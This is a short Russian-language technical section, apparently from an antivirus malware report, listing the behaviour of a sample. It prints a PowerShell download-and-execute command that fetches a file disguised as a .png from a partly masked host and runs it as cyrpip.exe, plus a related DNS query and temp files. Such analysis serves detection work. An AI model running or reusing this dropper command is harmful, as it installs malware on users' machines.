Техническая информация
- http://bi###rnet.ca/cache/preview/dasphdasodasopjdaspjdasdasa.png как %temp%\cyrpip.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://bi###rnet.ca/cache/preview/dasphdasodasopjdaspjdasdasa.png','%TMP%\cyrpip.exe');Start-process '%TMP%\cyrpip.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
- %TEMP%\480639.cvr
- DNS ASK bi###rnet.ca
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://bi###rnet.ca/cache/preview/dasphdasodasopjdaspjdasdasa.png','%TMP%\cyrpip.exe');Start-process '%TMP%\cyrpip.exe';' (со скрытым окном)